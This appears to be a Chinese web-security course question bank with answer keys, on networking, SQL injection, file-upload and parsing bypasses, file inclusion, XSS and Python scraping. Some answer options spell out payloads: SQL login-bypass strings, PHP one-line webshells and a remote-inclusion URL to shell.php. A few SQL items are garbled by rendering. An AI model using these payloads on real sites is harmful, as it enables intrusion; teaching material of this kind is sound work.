D、 DNSv6

您的答案: 标准答案: C

16、对比WinXP的默认启动过程,什么是Kali Linux启动过程所独有的()

A、 NBNS

B、 DHCPv6

C、 ICMPv6

D、 DNSv6

您的答案: 标准答案: C

17、IPv4地址的长度为多少位()

A、 16

B、 32

C、 64

D、 128

您的答案: 标准答案: B

18、某子网掩码为255.255.0.0,说明网络地址长度为多少位()

A、 16

B、 32

C、 64

D、 128

您的答案: 标准答案: A

19、在IP地址10.10.1.22和网络掩码255.255.0.0的情况下,下面哪个选项是正确的CIDR写法()

A、 10.10.1.22/8

B、 10.10.1.22/16

C、 10.10.1.22/24

D、 10.10.1.22/32

您的答案: 标准答案: B

20、计算机跨子网通信是需要默认网关来进行转发

A、 对

B、 错

您的答案: 标准答案: A

21、如果Wireshark当前所发送的数据包填满接收方的缓存时,就会在该TCP数据包上标记出什么字样

A、 TCP Window Full

B、 TCP Zero Window

C、 Zero Window Prob

D、 Zero Window Violation

您的答案: 标准答案: A

22、当接收方收到包含有“TCP Window Full”字样的TCP数据包以后,如果不能够及时处理缓存中的内容,那么接收方一般会回复一条带有什么字样的数据包,请求发送方暂缓发送数据()

A、 TCP Window Full

B、 TCP Zero Window

C、 Zero Window Prob

D、 Zero Window Violation

您的答案: 标准答案: B

23、发送方在发送了一个TCP数据包之后,经过RTO时间,没有收到对方的确认数据包,则应该?

A、 停止通信

B、 检测网络

C、 重传

D、 直接发送下一个数据包

您的答案: 标准答案: C

24、进行流量分析,端口镜像往往是我们首选的功能,因为它不会留下网络痕迹,也不会因此而产生额外的数据包

A、 对

B、 错

您的答案: 标准答案: A

25、以下哪项无线协议标准最不安全()

A、 WEP

B、 WPA

C、 WPA2

D、 WPA3

您的答案: 标准答案: A

26、无线网络协议遵循的是IEEE的什么标准()

A、 800.11

B、 801.1

C、 802.1

D、 802.11

您的答案: 标准答案: D

27、无线网络数据包与有线网络数据包最大的不同在于额外的802.11头部

A、 对

B、 错

您的答案: 标准答案: A

28、下面哪项是首选的嗅探器部署方法,因为它不会留下网络痕迹,也不会因此而产生额外的数据包()

A、 端口镜像

B、 ARP欺骗

C、 集线器输出

D、 使用网络分流器

您的答案: 标准答案: A

29、以下哪种wireshark部署方法,并不推荐采用()

A、 单个系统安装

B、 端口镜像

C、 集线器输出

D、 使用网络分流器

您的答案: 标准答案: A

30、不用考虑客户机临时下线的情况,我们采用哪种流量部署方法()

A、 端口镜像

B、 ARP欺骗

C、 集线器输出

D、 使用网络分流器

您的答案: 标准答案: C

31、在光纤情况下,不用考虑客户机临时下线的情况,我们采用哪种流量部署方法?

A、 端口镜像

B、 ARP欺骗

C、 集线器输出

D、 使用网络分流器

您的答案: 标准答案: D

32、进行环境测试评估,和进行性能审查,分析数据包,我们采用哪种流量部署方法()

A、 端口镜像

B、 ARP欺骗

C、 直接系统安装

D、 使用网络分流器

您的答案: 标准答案: C

33、网络分流器一般有聚合的和非聚合的网络分流器两种

A、 对

B、 错

您的答案: 标准答案: A

34、对于TCP的三次握手,以下哪项用于第一个数据包()

A、 SYN

B、 FIN

C、 RST

D、 ACK

您的答案: 标准答案: A

35、以下哪个文件保存有域名重定向信息()

A、 svchost

B、 csrss

C、 hosts

D、 spoolsv

您的答案: 标准答案: C

36、当试图访问对方未配置的的80端口时,对方数据包会回复()

A、 SYN

B、 FIN

C、 RST

D、 ARP

您的答案: 标准答案: C

37、在TCP的SYN数据包之后,应当收到什么数据包()

A、 SYN

B、 FIN

C、 RST

D、 SYN\ACK

您的答案: 标准答案: D

38、连远程服务器无响应无TCP RST这样的数据包,以下哪项不属于这种情况出现的原因()

A、 Web服务器配置错误

B、 Web服务器的协议栈崩溃

C、 防火墙数据包过滤设备

D、 Hosts配置错误

您的答案: 标准答案: D

39、DNS是基于什么协议()

A、 UDP

B、 TCP

C、 HTTP

D、 FTP

您的答案: 标准答案: A

40、DNS在如同区域传输中,使用什么协议()

A、 UDP

B、 TCP

C、 HTTP

D、 FTP

您的答案: 标准答案: B

41、关于CSRF说法正确的是

A、 删掉referer字段可以用来防止CSRF攻击

B、 CSRF攻击只能利用GET方式去达到攻击的目的

C、 登录受信任网站A,并在本地生成Cookie,在不登出A的情况下,访问危险网站B这样有可能会受到CSRF攻击

D、 XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站

您的答案: 标准答案: D

42、xss和csrf的漏洞原理是一样的

A、 对

B、 错

您的答案: 标准答案: B

43、在利用CSRF漏洞去脱裤的时候,说法错误的是

A、 CSRF是利用管理员的操作在无声无息中进行

B、 攻击者在无法预计管理员操作的过程中也是可以进行CSRF的攻击操作

C、 普通用户插入备份数据库的代码后,通过CSRF管理员触发到代码后会自动备份网站的数据库

D、 找到备份数据库的网站路径即可下载网址的.sql文件

您的答案: 标准答案: B

44、CSRF可以在无声无息中进行管理员的操作

A、 对

B、 错

您的答案: 标准答案: A

45、关于逻辑/越权漏洞说法有误的是

A、 任意用户查询,任意删属于越权漏洞,而密码找回漏洞属于逻辑漏洞

B、 一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽未对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,可以导致用户A可以操作其他人的信息。

C、 垂直权限的访问控制缺失是逻辑/越权漏洞的根本原因

D、 密码找回漏洞是权限管理不足导致的问题

您的答案: 标准答案: D

46、挖掘密码找回逻辑漏洞黑盒Fuzz来推断程序代码是关键

A、 对

B、 错

您的答案: 标准答案: A

47、关于密码找回说法有误的是

A、 密码找回的凭证太弱,如只需要填入一个四位或者六位的纯数字就可以重置密码,导致可以暴力破解

B、 有些密码找回凭证可从客户端直接获取

C、 密码找回凭证存与单个用户绑定的可以解决密码找回漏洞

D、 修改密码过程中,验证码是可操作的话 可以直接导致密码重置

您的答案: 标准答案: C

48、有时候我们可以通过注入漏洞来控制找回密码的凭证来达到密码重置的目的

A、 对

B、 错

您的答案: 标准答案: A

49、关于越权漏洞说法有误的是

A、 1. 越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定

B、 2. 挖掘越权漏洞一般是从一些拥有敏感信息的地方(例如:收货地址/个人资料/用户订单等)进行测试

C、 3. 处理越权漏洞可以通过用户对某一数据进行增删改查时需要去校验下所操作的数据是否属于该用户

D、 4. 越权漏洞的本身对网站不会照成攻击伤害

您的答案: 标准答案: D

50、以下哪个选项对asp运算符的解释错误?()

A、 <>为不等于

B、 IS判断两个字符串是否相等

C、 XOR为"异或"运算

D、 OR为"或"运算

您的答案: 标准答案: B

1、SQL语句"select * from user where name=’". n a m e . &quot; ′ a n d p a s s = ′ &quot; . name.&quot;&#x27; and pass=&#x27;&quot;. name."andpass=".pass."’"如何绕过登录?()

A、 $name设置值为admin’ and ‘1’=‘1’ $pass的值为123456

B、 $name设置值为admin’ and ‘1’='1 $pass的值为123456

C、 $name设置值为admin’ or ‘1’='1 $pass的值为123456

D、 $name设置值为admin’ or ‘1’=‘1’ $pass的值为123456

您的答案: 标准答案: C

2、以下哪个选项的内容可以替代SQL语句中的空格?()

A、 /**/

B、 #

C、 –

D、 //

您的答案: 标准答案: A

3、PHP的addslashes函数的作用是什么?()

A、 去除字符串中的预定义字符

B、 将字符串中的预定义字符之前添加反斜杠

C、 将字符串按照预定义字符进行分割

D、 将字符串中的预定义字符替换为空格

您的答案: 标准答案: B

4、mysql数据库使用utf-8字符集可能导致宽字节注入。

A、 对

B、 错

您的答案: 标准答案: B

5、%df’在以下哪种情况下能闭合单引号,形成宽字节注入?()

A、 使用PHP的trim函数,字符集使用utf-8

B、 使用PHP的trim函数,字符集使用gbk

C、 使用PHP的addslashes函数,字符集使用utf-8

D、 使用PHP的addslashes函数,字符集使用gbk

您的答案: 标准答案: D

6、以下哪种方式可以防止宽字节注入?()

A、 mysql_query(“set names gbk”)和addslashes()函数结合使用

B、 使用mysql_query(“set names gbk”)设置字符集

C、 mysql_set_charset(“gbk”)和mysql_real_escape_string()函数结合使用

D、 使用mysql_set_charset(“gbk”)设置字符集

您的答案: 标准答案: C

7、下列 ASP 接受参数的方式错误的是()

A、 request

B、 request.get

C、 request.cookie

D、 request.form

您的答案: 标准答案: B

8、下列链接中不存在注入点的是()

A、 http://www.****.com/***.asp?id=XX

B、 http://www.****.com/***.php?name=XX&page=99

C、 http://www.****.com/index/new/php-8.html

D、 http://www.****.com/news.html

您的答案: 标准答案: D

9、下列 mysql 的 PHP 函数说法错误的是()

A、 mysql_connect(‘host’, ‘username’, ‘pass’); 连接 mysql 链接

B、 mysql_db_select($database, $conn); 选择数据库

C、 mysql_query($sql, $conn); 执行 SQL 语句

D、 mysql_fetch_array($result); 将查询结果的一条返回到一个数组中

您的答案: 标准答案: B

10、下面说法是否正确,注射式攻击的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明()

A、 对

B、 错

您的答案: 标准答案: A

11、程序使用 SQLServer 数据库,当程序登录页面存在注入时,下列选项中,属于万能密码的是()

A、 用户名输入: '(或") AND 1 = 1-- ;密码随便输入

B、 用户名输入: '(或") && 1 = 1-- ;密码随便输入

C、 用户名输入: '(或") OR 1 = 1-- ;密码随便输入

D、 用户名输入: '(或") || 1 = 1-- ;密码随便输入

您的答案: 标准答案: C

12、已知 SQL 语句为: s q l = ′ S E L E C T ∗ F R O M ‘ m e m b e r ‘ W H E R E ‘ u s e r n a m e ‘ = &quot; ′ . sql = &#x27;SELECT * FROM `member` WHERE `username` = &quot;&#x27;. sql=SELECTFROMmemberWHEREusername="._GET[‘name’].’" AND password = “’.$_GET[‘pwd’].’”’; ,当访问 http://xxx.com?name=admin" OR “1”=“2&pwd=” OR “1”="1 时,可以完成用户验证吗()

A、 对

B、 错

您的答案: 标准答案: A

13、已知字符型注入语句 s q l = ′ S E L E C T ∗ F R O M ‘ m e m e b e r ‘ W H E R E ‘ u s e r n a m e ‘ = &quot; ′ . sql = &#x27;SELECT * FROM `memeber` WHERE `username` = &quot;&#x27;. sql=SELECTFROMmemeberWHEREusername=".user.’" AND pass = “’.$pass.’”’,下列能成功执行注入的是()

A、 $user = ‘admin OR 1 = 1–’; $pass = ‘something’;

B、 $user = ‘admin OR 1 = 2’; $pass = ‘" OR 1 = 1’;

C、 $user = ‘admin" OR 1 = 1’; $pass = ‘" OR 1 = 2’;

D、 $user = ‘admin" OR “1” = "2’; $pass = ‘" OR “1” = "1’;

您的答案: 标准答案: D

14、MySQL 5 中新增了一个 information_schema 库,该库中存储了数据库信息内容,可直接爆库、爆表、爆字段;而 MySQL 4 只能采用类似 Access 的方法进行查询猜解,该说法是否正确()

A、 对

B、 错

您的答案: 标准答案: A

15、用 ORDER BY 来判断字段数量时,ORDER BY 后面跟 5 时,正常返回,后面跟 6 时,报 Unknown column ‘6’ in ‘order clause’ 错误,当前目标表有几个字段()

A、 4

B、 5

C、 6

D、 7

您的答案: 标准答案: B

16、使用 ORDER BY 手工注入进行字段数判断时,ORDER BY 6 未报错,ORDER BY 7 报 UNKNOWN COLUMN ‘7’ IN ‘ORDER CLAUSE’,该表有几个字段()

A、 5

B、 6

C、 7

D、 8

您的答案: 标准答案: B

17、已知 MySQL 版本大于 5,手工注入时,访问 http://127.0.0.1/index.php?id=3’%20SELECT%20GROUP_CAT(SCHEMA_NAME)%20FROM%20INFROMATION_SCHEMA.SCHEMATA,可以获取到的是()

A、 所有数据库

B、 所有表

C、 所有字段

D、 所有字段类型

您的答案: 标准答案: A

18、在 MySQL INFORMATION_SCHEMA 数据库中,保存数据库信息的表是()

A、 TABLES

B、 SCHEMATA

C、 COLUMNS

D、 DATABASES

您的答案: 标准答案: B

19、SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() LIMIT 0,1 ,该语句查询的是当前数据库的第一条表信息,该说法正确吗()

A、 对

B、 错

您的答案: 标准答案: A

20、下列 MySQL 的 SQL 语句中,能同时查询用户、数据库版本、数据库并以 , 分割的是()

A、 SELECT user(),version(),database();

B、 SELECT user(),’,’,version(),’,’,database();

C、 SELECT user().version().database();

D、 SELECT group_concat(user(),version(),database());

您的答案: 标准答案: D

21、下列 MySQL 的 SQL 语句中,能够查询所有数据库的是()

A、 SELECT TABLE_NAME FROM INFROMATION_SCHEMA.TABLES;

B、 SELECT SCHEMA_NAME FROM INFROMATION_SCHEMA.SCHEMATA;

C、 SELECT DATABASE_NAME FROM INFROMATION_SCHEMA.DATABASES;

D、 SELECT COLUMN_NAME FROM INFROMATION_SCHEMA.COLUMNS;

您的答案: 标准答案: B

22、下面上传突破说法错误的是()

A、 客户端 JavaScript 可以通过 Burp 抓包修改进行上传

B、 服务端 MIME 类型检测可以通过修改 Content-Type 进行上传

C、 服务端文件扩展名检测可以通过服务端解析漏洞,上传其他扩展名文件进行突破

D、 使用 a.asp;.jpg 对 IIS 8.0 服务器进行上传突破

您的答案: 标准答案: D

23、在非 PHP 的 WEB 安全中出现概率很大而且威力也很大的攻击主要有两种,第一种是 SQL 注入,第二种是上传攻击。该说法正确吗()

A、 对

B、 错

您的答案: 标准答案: A

24、使用 Burp 抓包实验 0x00 截断时,下面做法可以完成绕过的是()

A、 直接在抓的包中修改 filename 部分,将可以上传的扩展名前面加空格拼接到文件后面

B、 直接在抓的包中修改 Content-Type

C、 在 Burp 抓的包中选择 Hex(十六进制),修改符合条件的后缀名前面点的十六进制为 00

您的答案: 标准答案: C

25、服务器检测绕过(目录路径检测),因为对目录路径的检测不够严谨而导致可以使用 0x00 截断攻击,该说法是否正确()

A、 对

B、 错

您的答案: 标准答案: A

26、在 fckeditor 2.4.3 或之前版本的黑名单中 ConfigDeniedExtensions.Add “File”, “html|htm|php|php2|php3|php4”,下列方法中可以绕过上传 php 文件的是()

A、 上传文件 shell.PhP

B、 上传文件 shell.php4

C、 上传文件 shell.php3

D、 上传文件 shell.php .jpg

您的答案: 标准答案: A

27、已知服务器为 Apache,且后缀名 123abc 未在黑名单中、后缀名 asp 在黑名单中,上传 shell.asp.123abc 文件能否成功执行()

A、 对

B、 错

您的答案: 标准答案: A

28、利用 IIS 解析漏洞,含有一句话木马的文件 test.php;.jpg,可以被菜刀连接成功吗()

A、 对

B、 错

您的答案: 标准答案: A

29、下列即属于黑名单检测绕过又属于白名单检测绕过的是()

A、 文件名大小写绕过

B、 名单列表绕过

C、 特殊文件名绕过(windows)

D、 0x00 截断绕过

您的答案: 标准答案: D

30、一个文件名为 x1.x2.x3 的文件,Apache 会从 x3 的位置往 x1 的位置开始尝试解析,一直往前解析,直到遇到一个能解析的扩展名为止,该说法正确吗()

A、 对

B、 错

您的答案: 标准答案: A

31、当 PHP 配置设置为可以远程包含时,下列是远程包含的是()

A、 http://www.mubiao.com/file.php?read=../../../image/shell.php

B、 http://www.mubiao.com/file.php?read=/image/shell.php

C、 http://www.mubiao.com/file.php?read=C:/htdocs/image/shell.php

D、 http://www.mubiao.com/file.php?read=http://www.xxx.com/shell.php

您的答案: 标准答案: D

32、当 PHP 配置文件中, allow_url_include 设置为 off 时,可以包含远程文件,该说法正确吗()

A、 对

B、 错

您的答案: 标准答案: B

33、Web目录下的upload/test.zip文件通过以下哪种链接可以下载?()

A、 upload/…/test.zip

B、 upload/…/./test.zip

C、 config/…/upload/test.zip

D、 config/././upload/test.zip

您的答案: 标准答案: C

34、Windows平台下的Web目录下的test.php不能通过test.PhP访问。

A、 对

B、 错

您的答案: 标准答案: B

35、PHP执行函数strrpos(“I_love_php.php”,".php")会返回什么值?()

A、 7

B、 8

C、 9

D、 10

您的答案: 标准答案: D

36、PHP执行函数strtolower(“PHP”)会返回什么值?()

A、 php

B、 Php

C、 PHp

D、 PHP

您的答案: 标准答案: A

37、关于安全狗检测cookie注入的功能,下列哪些说法正确?

A、 点击主动防御菜单中,Sql注入规则,选择cookie,点击确定

B、 无需配置,安全狗默认开启

C、 点击资源保护,选择cookie注入检测

您的答案: 标准答案: A

38、如果网站id参数过滤了and和号,就无法进行手工判断是否有注入点。

A、 对

B、 错

您的答案: 标准答案: B

39、在Sqlmap的tamper插件中,可以将空格转移成其他字符的是哪个脚本?

A、 space2mysqlblank

B、 apostrophemask

C、 equaltolike

您的答案: 标准答案: A

40、Sqlmap使用哪个参数可以直接对网站进行注入判断?

A、 --data

B、 --dbs

C、 =-u

您的答案: 标准答案: C

41、如何判断网站是否存在注入点?

A、 在网站参数后输入中文字符

B、 在网站参数后输入and 1=1、and 1=2

C、 在网站参数后输入 or 1=1

您的答案: 标准答案: B

42、Sqlmap中,下列哪个参数,可以获取当前数据库所在名称?

A、 --current-db

B、 --data

C、 --tables

您的答案: 标准答案: A

43、以下选项中,那一项是正确的PHP一句话木马?

A、 <?php @Page($_POST[value]);?>

B、 <?php @eval($_POST[v]);?>

C、 <%execute(request(“value”))%>

D、 <%eval(Request.Item[“value”])%>

您的答案: 标准答案: B

44、用户在上传图片时,快速返回错误提示则说明是本地的上传类型验证。

A、 对

B、 错

您的答案: 标准答案: A

45、当页面返回“File Type Error”时,则说明你上传的文件类型不正确,网站对文件类型进行了相关验证。

A、 对

B、 错

您的答案: 标准答案: A

46、针对文件扩展名检测,哪些扩展名可以绕过该限制?

A、 php2和php3

B、 php4和php3

C、 php5和php3

D、 php5和php2

您的答案: 标准答案: B

47、针对文件内容检测,如何进行绕过而上传?

A、 修改图片的类型

B、 使用burp抓包并插入一句话木马

C、 使用burp抓包并插入一句话木马,修改文件后缀

D、 使用burp抓包并修改文件后缀

您的答案: 标准答案: C

48、空字节截断目录路径检测绕过是将文件后缀替换空格就会成功上传

A、 对

B、 错

您的答案: 标准答案: B

49、在本节视频中,IIS6.0站上的解析缺陷绕过,上传后保存的路径正确的是?

A、 在1.php目录下

B、 1.php:1412790008.jpg

C、 upload/1.php

D、 upload/1412790008.jpg

您的答案: 标准答案: B

50、Apache服务中的解析缺陷,可以导致绕过上传的文件格式是什么?

A、 7z

B、 asp

C、 php

D、 asps

您的答案: 标准答案: A

1、htaccess文件上传解析漏洞,可以导致正确被解析的文件格式是?

A、 .png

B、 .bmp

C、 .img

D、 .jpg

您的答案: 标准答案: D

2、FCK编辑器的查看版本的URL路径是?

A、 _whatsnew.htmls

B、 _whatsnew.html

C、 _samples/default.html

D、 _samples/default.html/fck.html

您的答案: 标准答案: B

3、使用FCK编辑器解析漏洞进行上传,以下说法正确的是?

A、 直接利用新建文件夹1.asp

B、 新建文件夹1.asp,在1.asp目录下新建2.asp

C、 利用新建文件夹1.asp,再修改文件内容上传

D、 修改文件内容上传

您的答案: 标准答案: B

4、在IIS管理器里设置IP地址和域名限制拒绝列表不可以限制页面的访问

A、 对

B、 错

您的答案: 标准答案: B

5、.htaccess设置列表allow参数的意思是?

A、 禁止显示目录列表

B、 封禁一个IP地址

C、 允许特定的IP地址

D、 重定向

您的答案: 标准答案: C

6、下列选项对于谷歌语法中的site用法解释正确的是?

A、 把搜索范围规定在特定的站点中

B、 搜素范围限定在标题中

C、 网址中url的一些信息

D、 网页的链接中包含所有查询关键字

您的答案: 标准答案: A

7、服务端未对传入的跳转URL参数进行检测和控制而导致的URL调整漏洞

A、 对

B、 错

您的答案: 标准答案: A

8、XSS漏洞产生的原因是什么?

A、 对用户的输入过滤不足

B、 浏览器植入恶意软件

C、 Post请求被劫持

D、 WebKit安全机制不严谨

您的答案: 标准答案: A

9、利用存储型XSS漏洞可以进行XSS蠕虫攻击。

A、 对

B、 错

您的答案: 标准答案: A

10、当XSS代码被嵌入到标签中时,应该使用何种方式继续尝试进行攻击?

A、 修改浏览器进行尝试

B、 闭合标签后提交代码

C、 更换页面继续进行尝试

D、 闭合

您的答案: 标准答案: B

11、在浏览器支持JavaScript伪协议的情况下,可以使用HTML的属性值执行XSS代码

A、 对

B、 错

您的答案: 标准答案: A

12、在IE5及以后,CSS样式中使用Expression同样可以触发XSS漏洞

A、 对

B、 错

您的答案: 标准答案: A

13、采用黑名单过滤方式,用户可以结合使用注释字符感染和欺骗过滤器

A、 对

B、 错

您的答案: 标准答案: A

14、css_soup = BeautifulSoup(’

’);css_soup.p[‘class’] 这句输出的是字符串"body"吗

A、 对

B、 错

您的答案: 标准答案: B

15、Tag.clear() 方法是用来移除当前Tag的吗?

A、 对

B、 错

您的答案: 标准答案: B

16、code, head, html, redirect_url, log = hh.http(url)中log的数据类型是什么?

A、 字符串

B、 数字

C、 字典

D、 链表

您的答案: 标准答案: C

17、hackhttp可以用来上传文件这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: A

18、hackhttp是通过以下代码来自定义cookie的吗 hackhttp.hackhttp(cookie=“a=b;”) ?

A、 对

B、 错

您的答案: 标准答案: B

19、BeautifulSoup 对象的.contents 属性可以将tag的子节点以数据类型的方式输出,是什么数据类型?

A、 字符串

B、 数字

C、 字典

D、 列表

您的答案: 标准答案: D

20、hh.http函数可以添加raw参数来发送原始http数据包这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: A

21、hackhttp的示例代码code, head, html, redirect_url, log = hh.http(url)中hackhttp源码定义return这五个值的地方没有进行异常处理这个说法正确吗?

A、 对

B、 错

您的答案: 标准答案: B

22、queue库中构造函数Queue.LifoQueue实现的队列的进出关系是什么。

A、 先进先出

B、 先进后出

C、 优先级低先出

D、 就不出来

您的答案: 标准答案: B

23、class sb(threading.Thread):创建threading.Thread的父类来包装一个线程对象这个说法正确吗?

A、 对

B、 错

您的答案: 标准答案: B

24、代码for i in range(2122, 2127):的循环是用来遍历数字2122-2127这个说法正确吗?

A、 对

B、 错

您的答案: 标准答案: A

25、<div.*>(.+)这个正则匹配的是div标签中的文本内容这个说法正确吗。

A、 对

B、 错

您的答案: 标准答案: A

26、re.compile(“lowb”)会将字符串转化为一个什么对象?

A、 StringObject

B、 RegexObject

C、 InterObject

D、 NoneObject

您的答案: 标准答案: B

27、所有场景下使用re.compile预编译正则表达式都可以加快程序运行速度吗?

A、 对

B、 错

您的答案: 标准答案: B

28、视频中通过http响应中的响应实体来判断请求是否成功这个说法是否正确?

A、 对

B、 错

您的答案: 标准答案: A

29、视频中爬去漏洞id的代码是调用bs4进行筛选的这个说法对吗

A、 对

B、 错

您的答案: 标准答案: A

30、视频中是通过遍历页面获取每个漏洞的信息的吗?

A、 对

B、 错

您的答案: 标准答案: A

31、假设爬取poc的过程中响应的Content-Type为application/pdf那么我们可以说爬取成功了吗

A、 对

B、 错

您的答案: 标准答案: B

32、当爬取某一资源必须处在登陆状态时,带上cookie访问是否是一个长久的解决方案?

A、 对

B、 错

您的答案: 标准答案: B

33、Python库requests中requests.get(某url).headers输出的数据的数据类型是什么?

A、 元组

B、 字典

C、 字符串

D、 列表

您的答案: 标准答案: B

34、HTTP中的Keep-Alive是指持久连接吗

A、 对

B、 错

您的答案: 标准答案: A

35、编写Python程序请求网页的时候设置timeout主要是为了防止程序奔溃这个说法正确吗

A、 对

B、 错

您的答案: 标准答案: B

36、代理ip因为经常失效,所以需要维护一个代理ip池定期检查是否失效,这个说法是否正确?

A、 对

B、 错

您的答案: 标准答案: A

37、以下哪项是爬取代理ip中不需要的数据

A、 ip

B、 端口

C、 内存地址

D、 连接类型

您的答案: 标准答案: C

38、Python requests可以用来验证代理吗

A、 对

B、 错

您的答案: 标准答案: A

39、Zoomeye的api 当请求错误时会返回一个json格式的错误响应,下面哪个不是错误响应中json的字段?

A、 error

B、 message

C、 url

D、 userkey

您的答案: 标准答案: D

40、视频代码中使用json.load()的作用在于将字符串类型转化为 Python的字典类型这个说法正确吗?

A、 对

B、 错

您的答案: 标准答案: A

41、数据库管理系统DBMS的全称是什么?

A、 Database Management Software

B、 Database Management System

C、 Director Base Medical Services

D、 Data Being Manipulated Sequentially

您的答案: 标准答案: B

42、数据库(Database)是按照数据结构来组织、存储和管理数据的仓库,这句话对吗?

A、 对

B、 错

您的答案: 标准答案: A

43、关系数据库,是建立在关系模型基础上的数据库,借助于集合代数等数学概念和方法来处理数据库中的数据。这句话对吗?

A、 对

B、 错

您的答案: 标准答案: A

44、在下列关于关系型数据库系统的叙述中,正确的是

A、 表的字段之间和记录之间都不存在联系

B、 表的字段之间不存在联系,而记录之间存在联系

C、 表的字段之间和记录之间都存在联系

D、 表中只有字段之间存在联系

您的答案: 标准答案: C

45、revoke select on admin to bai这个SQL语句是干嘛的?

A、 数据查询DDL

B、 授权DCL

C、 删除记录DML

D、 回滚TCL

您的答案: 标准答案: B

46、SQL的全称是什么?

A、 Structured Question Language

B、 Strong Question Language

C、 Specified Quality Level

D、 Structured Query Language

您的答案: 标准答案: D

47、哪个 SQL 语句用于从数据库中提取数据?

A、 EXTRACT

B、 SELECT

C、 OPEN

D、 GET

您的答案: 标准答案: B

48、DDL(Data Definition Language)数据库操纵语言,用于定义数据库的三级结构,包括外模式、概念模式、内模式及其相互之间的映像,定义数据的完整性、安全控制等约束?

A、 对

B、 错

您的答案: 标准答案: B

49、哪条 SQL 语句用于更新数据库中的数据?

A、 UPDATE

B、 MODIFY

C、 SAVE

D、 SAVE AS

您的答案: 标准答案: A

50、哪条 SQL 语句用于删除数据库中的数据?

A、 COLLAPSE

B、 REMOVE

C、 DELETE

D、 del

您的答案: 标准答案: C

1、MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。这句话对吗?

A、 对

B、 错

您的答案: 标准答案: A

2、网站数据库经常会遭受哪种类型的攻击?

A、 跨站脚本

B、 跨站请求伪造

C、 SQL注入

D、 不安全的直接对象引用

您的答案: 标准答案: C

3、通过 SQL,您如何从 “ichunqiu” 表中选取 “username” 列的值以 “a” 开头的所有记录?

A、 SELECT * FROM ichunqiu WHERE username LIKE ‘a%’

B、 SELECT * FROM ichunqiu WHERE username=‘a’

C、 SELECT * FROM ichunqiu WHERE username LIKE ‘%a’

D、 SELECT * FROM ichunqiu WHERE username=’%a%’

您的答案: 标准答案: A

4、哪个 SQL 关键词用于对结果集进行排序?

A、 ORDER

B、 ORDER BY

C、 SORT

D、 SORT BY

您的答案: 标准答案: B

5、关于HTML5说法正确的是?

A、 HTML5只是对HTML4的一个简单升级

B、 所有主流浏览器都支持HTML5

C、 HTML5新增了离线缓存机制

D、 HTML5主要是针对移动端进行了优化

您的答案: 标准答案: C

6、下列哪一项是CSS正确的语法构成?

A、 body:color=black

B、 {body;color:black}

C、 body {color: black;}

D、 {body:color=black(body}

您的答案: 标准答案: C

7、我们可以在下列哪个 HTML 元素中放置 Javascript 代码?

A、

B、

C、

D、

您的答案: 标准答案: B

8、JavaScript是弱类型语言,不需要用户对变量类型进行明确的定义,这句话对吗?

A、 对

B、 错

您的答案: 标准答案: A

9、定义 JavaScript 数组的正确方法是

A、 var txt = new Array(“George”,“John”,“Thomas”)

B、 var txt = new Array=“George”,“John”,“Thomas”

C、 var txt = new Array:1=(“George”)2=(“John”)3=(“Thomas”)

D、 var txt = new Array(1:“George”,2:“John”,3:“Thomas”)

您的答案: 标准答案: A

10、ActionScript中所有数据都是对象这句话对吗?

A、 对

B、 错

您的答案: 标准答案: A

11、以下函数中,取得给定日期的月份的是什么

A、 day()

B、 month()

C、 year()

D、 weekday()

您的答案: 标准答案: B

12、下面哪种语言不被浏览器执行

A、 ASP

B、 HTML

C、 VBScript

D、 Javascript

您的答案: 标准答案: A

13、ASP.NET中,对于已经生成好的Web Service,在部署和实现该XML Web Service的时候,至少需要的文件有

A、 .asmx文件和.dll文件

B、 .dll文件和.disco文件

C、 AssemblyInfo.cs文件和Web.config文件

D、 AssemblyInfo.cs文件和.asmx文件

您的答案: 标准答案: A

14、ASP.NET中启动页级别的跟踪,可以在@Page指令中设置()参数来实现。

A、 race和TraceRange

B、 Trace和TraceMode

C、 Try和Catch

D、 Try和Finally

您的答案: 标准答案: B

15、ASP.NET程序中,以下()最有利于黑客在Web服务器上对站点文件进行破坏。

A、 Applicaion对象的Lock方法

B、 Server对象的MapPath方法

C、 客户端的JavaScript脚本

D、 页面内的_ViewState控件

您的答案: 标准答案: C

16、下面不属于PHP的标签是

A、 < >

B、 <? ?>

C、 <?= ?>

D、 <?php ?>

您的答案: 标准答案: A

17、以下关于PHP的描述不正确的是

A、 PHP是一种弱类型、解释型语言

B、 PHP与C、JAVA等面向对象一样,需要明确指定变量类型

C、 PHP可以与MySQL进行交互,创建动态Web站点

D、 PHP是PHP:Hypertext Preprocessor的递归缩写

您的答案: 标准答案: B

18、下面哪个是JSP中最基本的对象,它是用户与服务器进行交互的基础。

A、 Response对象

B、 Application对象

C、 Request对象

D、 Session对象

您的答案: 标准答案: C

19、在JSP程序中只有3种编译指令,分别是加载指令、标记数据库指令和什么指令

A、 描述指令

B、 网页指令

C、 取代指令

D、 释放指令

您的答案: 标准答案: B

20、Page指令中的“contenType”属性是用于指出什么类型

A、 服务器类型

B、 用户类型

C、 数据库类型

D、 网页类型

您的答案: 标准答案: D

21、在请求头中Connection表示什么

A、 表示客户端与服务连接类型

B、 表示浏览器有能力解码的编码类型

C、 表示浏览器支持的 MIME 类型

D、 表示客户端与服务连接类型

您的答案: 标准答案: D

22、burpsuite不可以抓到HTTPS的内容这句话对吗

A、 对

B、 错

您的答案: 标准答案: B

23、使用burpsuite爆破时在哪里设置Payload type为Numbers?

A、 Repeater下的payloads

B、 Intruder下的Payloads

C、 Proxy下的payloads

D、 Intruder下Target

您的答案: 标准答案: B

24、Webshell的功能不能实现读取注册表,这句话对吗?

A、 对

B、 错

您的答案: 标准答案: B

25、<?php system($_SERVER['HTTP_USER_AGENT'])?>这句webshell通过下面什么方式来执行的呢?

A、 参数HTTP_USER_AGENT

B、 HTTP请求头HTTP_USER_AGENT

C、 参数$_SERVER[‘HTTP_USER_AGENT’]

D、 参数system

您的答案: 标准答案: B

26、在php中使用全等于来判断大写的PHP和小写的php是否相等,以下说法正确的是?

A、 不相等

B、 相等

